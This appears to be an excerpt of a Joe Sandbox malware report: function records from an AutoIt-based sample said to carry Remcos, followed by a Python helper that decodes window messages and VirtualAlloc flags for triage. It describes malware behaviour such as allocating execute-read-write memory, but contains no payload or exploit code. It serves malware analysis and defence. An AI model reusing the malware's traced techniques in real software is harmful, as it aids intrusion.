                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: f7c4e248de33641389f52bd98d7bf3d7c3385b8a6ff3fa45b25053e1a7dac305
                                    • Instruction ID: cbf4242283cb427104b2d9a39419efba453abc2b8d7c9e8bfffe45fd7762f544
                                    • Opcode Fuzzy Hash: f7c4e248de33641389f52bd98d7bf3d7c3385b8a6ff3fa45b25053e1a7dac305
                                    • Instruction Fuzzy Hash: 16412D76900218BEDF10DFA4CC95EDEBBB8FB09700F004199F945B7291DA716E45DBA1
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0090F910,00000000,?,?,?,?), ref: 009079DF
                                    • GetWindowLongW.USER32 ref: 009079FC
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00907A0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: f49437fba8285d23066340000646d4ebdce8ebd0b7f7c3cd3efed30ef576215a
                                    • Instruction ID: c50644d91091c1507ca04ea1ab8da8acc208a4384b1d22a3f5860b76793c7775
                                    • Opcode Fuzzy Hash: f49437fba8285d23066340000646d4ebdce8ebd0b7f7c3cd3efed30ef576215a
                                    • Instruction Fuzzy Hash: FF31AB31604606AFDB219EB8CC45BEBB7A9FB49334F208725F875E22E0D731E9519B50
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00907461
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00907475
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00907499
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: c91caaba404389f0d816759702626dea0d3704ee33f46d858beb6d64d456bbd1
                                    • Instruction ID: 9f042db68d60557cbb334769c8d8371873f5d2abbca2464649ede71f5c7141c9
                                    • Opcode Fuzzy Hash: c91caaba404389f0d816759702626dea0d3704ee33f46d858beb6d64d456bbd1
                                    • Instruction Fuzzy Hash: DB218032514219AFDF118F94CC46FEA7B6AEB48724F110214FE15AB1E0DAB5A8519BA0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00907C4A
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00907C58
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00907C5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: f32b131edfca808b2ab4b0d85e60aa566cf4f94003cd4ddd2c1825891918e1e1
                                    • Instruction ID: 93e9fe650d9cd82112754978dfddffaa29c40100e0ac12a53a72e779536d0471
                                    • Opcode Fuzzy Hash: f32b131edfca808b2ab4b0d85e60aa566cf4f94003cd4ddd2c1825891918e1e1
                                    • Instruction Fuzzy Hash: 20218EB5604219AFEB10DF68DCC1DA677ECEF5A364B140059FA01DB3A1CB31EC519B60
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00906D3B
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00906D4B
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00906D70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: f85a7d14ffc2c73d62fb614e6ab7c8163bc08966adba5f28def67c8b3daa7ca6
                                    • Instruction ID: 081e4c61d4cc867958d622ddd458b2832ff46bd6eaab73fd73b3a3cff35f6939
                                    • Opcode Fuzzy Hash: f85a7d14ffc2c73d62fb614e6ab7c8163bc08966adba5f28def67c8b3daa7ca6
                                    • Instruction Fuzzy Hash: 52218032610118BFEF118F54DC45FAB3BBEEB89764F018124FA459B1E0CB71AC619BA0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00907772
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00907787
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00907794
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 2ba2aa6706988005a16a72f598e9bb857df4aab2fcf96d8e1c9e17bc0219ef9e
                                    • Instruction ID: 7809f49086fd5a2fd623390755924792f53112b0069256e08592b419174d6493
                                    • Opcode Fuzzy Hash: 2ba2aa6706988005a16a72f598e9bb857df4aab2fcf96d8e1c9e17bc0219ef9e
                                    • Instruction Fuzzy Hash: 99110432604209BEEF205FA4CC05FA777ACEF88B64F010128FA41920D0C672E811DB10
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00884AD0), ref: 00884B45
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00884B57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                    • Instruction ID: d7a178d9d750f48432833be6aa3a196830e4f1d6180814c45318ae64ddc8ec23
                                    • Opcode Fuzzy Hash: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                    • Instruction Fuzzy Hash: 2AD01235A14713CFD730AF72D838B0676D4FF45355B1188399485D6990E670E580CB54
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00884BD0,?,00884DEF,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884C11
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: 35754cf855ed74607ab95e5492fa73f26f1c8ce08ea35fc0f057b3282c5a2355
                                    • Instruction ID: 1629bfa7fa59b06c7150d11fb8ceb4bfd5842306a067d96003cb28150710458f
                                    • Opcode Fuzzy Hash: 35754cf855ed74607ab95e5492fa73f26f1c8ce08ea35fc0f057b3282c5a2355
                                    • Instruction Fuzzy Hash: C2D01231515723CFD730AF71D918606B6DAFF09355B118C39D485D6550E6B0D580CB50
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00884B83,?), ref: 00884C44
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884C56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 61bb3d8a46b04f4e90148d01f151059716071070773a6cc48776acda238eedce
                                    • Instruction ID: 44414b84f1f117ba099a03b75f44ce5f9fb031c62cb23e1bd0598fa8f92277be
                                    • Opcode Fuzzy Hash: 61bb3d8a46b04f4e90148d01f151059716071070773a6cc48776acda238eedce
                                    • Instruction Fuzzy Hash: 1CD01772528713CFD730AF31D91860A76E9FF19355B12883AA496D69A0E670D980CB50
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00901039), ref: 00900DF5
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00900E07
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: 1757015d9e2c2e10f26d6d1de5d1c285314288e0ec43571b218fc59706a66cec
                                    • Instruction ID: fa0bd1d556e342e58000aae9a15beab43499d4cb68f4898c08f75b0475197e0a
                                    • Opcode Fuzzy Hash: 1757015d9e2c2e10f26d6d1de5d1c285314288e0ec43571b218fc59706a66cec
                                    • Instruction Fuzzy Hash: 76D01770528722CFD7219F75C80878676E9AF84356F118C3EA886E2590E6B0D8D0CA50
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008F8CF4,?,0090F910), ref: 008F90EE
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008F9100
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 910101a80ed4f20c07a7e8bfba9ae1ccb56cfb3b5107b0a85cc7a4f6d25dbea1
                                    • Instruction ID: e136986e3c66535bb99f45602a2e54060708bc8b11b1fa999102db4ae4e45157
                                    • Opcode Fuzzy Hash: 910101a80ed4f20c07a7e8bfba9ae1ccb56cfb3b5107b0a85cc7a4f6d25dbea1
                                    • Instruction Fuzzy Hash: ACD01734528713CFDB309F31D82861676E8FF05355B12887AE6C6D69A0EA74C8C0CA90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: 0f18b073e0334a8ab2eae23c85880fcbe52abf108abe193b5828aee5ae808216
                                    • Instruction ID: 79c4c728c221e4fbea9db52071ba87706dbe67b48e10e778b63d91f1be4d2e0d
                                    • Opcode Fuzzy Hash: 0f18b073e0334a8ab2eae23c85880fcbe52abf108abe193b5828aee5ae808216
                                    • Instruction Fuzzy Hash: 7CD0177180910DEACF11DB9098CCEB9737CFB1A309F14046AB402E2446E231CB94EB61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                                    • Instruction ID: 3e08fe44071d9a96aa13be39e780bf51b784434105c32e1f31afa055175006ee
                                    • Opcode Fuzzy Hash: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                                    • Instruction Fuzzy Hash: 74C16074A0421AEFCB14CF94C884EAEBBB5FF48714B558699E805EB351E730ED81DB90
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 008FE0BE
                                    • CharLowerBuffW.USER32(?,?), ref: 008FE101
                                      • Part of subcall function 008FD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FD7C5
                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008FE301
                                    • _memmove.LIBCMT ref: 008FE314
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                    • String ID:
                                    • API String ID: 3659485706-0
                                    • Opcode ID: 6ecceffbef17775d357cbda0cb09eef6f001bfd5a97de7e050aabd23d26ad4f4
                                    • Instruction ID: 57f48a2a5be94fb6696d270dfe919a7da40d5d25f8df65f8f57871d0248f1788
                                    • Opcode Fuzzy Hash: 6ecceffbef17775d357cbda0cb09eef6f001bfd5a97de7e050aabd23d26ad4f4
                                    • Instruction Fuzzy Hash: 26C126716083059FC714DF28C480A6ABBE4FF89718F14896EF999DB361D731E946CB82
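The records above list raw argument values: 00000469 and 00000465 sent to an msctls_updown32 window, 00000180 and 00000186 to a Listbox, 00000405/00000406/00000414 to an msctls_trackbar32, kernel32 and advapi32 exports bound at runtime through GetProcAddress, and a VirtualAlloc with flAllocationType 00003000 and flProtect 00000040 immediately followed by _memmove. These are the common-control initialisation messages and compatibility lookups of the AutoIt interpreter (the >>>AUTOIT NO CMDEXECUTE<<< string in the Wow64DisableWow64FsRedirection record is an AutoIt runtime string), so an analyst triaging this report needs to turn the constants back into names before deciding which functions belong to the interpreter and which to the Remcos payload. The Python helper below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It parses the report's `Api.MODULE(args), ref: ADDR` trace lines (the sample input is copied from the records above and is constructed for the example), names the messages using the documented commctrl.h and winuser.h values for the window class given in each record's String ID, expands the VirtualAlloc flags from winnt.h, and collects the runtime-resolved export names. The message and flag tables are deliberately limited to the values that occur in these records.

```python
"""Decode the raw constants in Joe Sandbox API-trace lines: common-control
SendMessageW messages, VirtualAlloc flags and runtime GetProcAddress lookups."""
import re
from typing import Dict, List, Optional

WM_USER = 0x0400

# Constructed sample input: trace lines copied from the function records above.
SAMPLE_LINES = [
    "SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00907C4A",
    "SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00907C58",
    "SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00906D3B",
    "SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00907787",
    "SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00907794",
    "GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00884B57",
    "GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884C23",
    "GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00900E07",
    "VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008FE301",
]

# Message names per window class, limited to the values seen in the records above.
# Up-down (UDM_*) and trackbar (TBM_*) messages are WM_USER-relative (commctrl.h);
# listbox messages are absolute (winuser.h).
MSG_TABLES: Dict[str, Dict[int, str]] = {
    "msctls_updown32": {WM_USER + 101: "UDM_SETRANGE", WM_USER + 105: "UDM_SETBUDDY"},
    "msctls_trackbar32": {WM_USER + 5: "TBM_SETPOS", WM_USER + 6: "TBM_SETRANGE",
                          WM_USER + 20: "TBM_SETTICFREQ"},
    "Listbox": {0x0180: "LB_ADDSTRING", 0x0186: "LB_SETCURSEL"},
}
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET"}
PROTECTS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
            0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

CALL_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")


def parse_call(line: str) -> Optional[dict]:
    """Split 'Api.MODULE(a,b,c), ref: ADDR' into parts; unknown ('?') arguments become None."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    args = [None if a == "?" else a for a in m.group("args").split(",")]
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def _hex(arg: Optional[str]) -> Optional[int]:
    """Numeric arguments are zero-padded hex without 0x; string arguments yield None."""
    try:
        return int(arg, 16) if arg is not None else None
    except ValueError:
        return None


def _int16(word: int) -> int:
    """Sign-extend a 16-bit word; UDM_SETRANGE limits are signed shorts."""
    return word - 0x10000 if word & 0x8000 else word


def decode_sendmessage(line: str, control_class: str) -> str:
    """Name the message for the window class given in the record's String ID and
    unpack the MAKELONG-packed range arguments."""
    call = parse_call(line)
    if call is None or call["api"] != "SendMessageW" or len(call["args"]) < 4:
        raise ValueError("not a SendMessageW trace line")
    msg, wparam, lparam = (_hex(a) for a in call["args"][1:4])
    if msg is None:
        return "unknown message"
    name = MSG_TABLES.get(control_class, {}).get(msg, f"0x{msg:04X}")
    if lparam is not None:
        lo, hi = lparam & 0xFFFF, (lparam >> 16) & 0xFFFF
        if name == "UDM_SETRANGE":  # MAKELONG(nUpper, nLower): low word = max, high word = min
            return f"{name} min={_int16(hi)} max={_int16(lo)}"
        if name == "TBM_SETRANGE":  # MAKELONG(lMinimum, lMaximum)
            return f"{name} min={lo} max={hi}"
    if name == "TBM_SETTICFREQ" and wparam is not None:
        return f"{name} freq={wparam}"
    return name


def decode_virtualalloc(line: str) -> str:
    """Expand VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) into symbolic flags."""
    call = parse_call(line)
    if call is None or call["api"] != "VirtualAlloc" or len(call["args"]) < 4:
        raise ValueError("not a VirtualAlloc trace line")
    size, alloc, protect = (_hex(a) for a in call["args"][1:4])
    flags = [n for bit, n in ALLOC_TYPES.items() if alloc is not None and alloc & bit]
    return f"size={size} type={'|'.join(flags) or 'unknown'} protect={PROTECTS.get(protect, 'unknown')}"


def resolved_imports(lines: List[str]) -> List[str]:
    """Export names the sample binds at runtime through GetProcAddress, in trace order."""
    return [c["args"][1] for c in map(parse_call, lines)
            if c and c["api"] == "GetProcAddress" and len(c["args"]) > 1]


if __name__ == "__main__":
    print(decode_sendmessage(SAMPLE_LINES[1], "msctls_updown32"))
    print(decode_virtualalloc(SAMPLE_LINES[8]))
    print(resolved_imports(SAMPLE_LINES))
```

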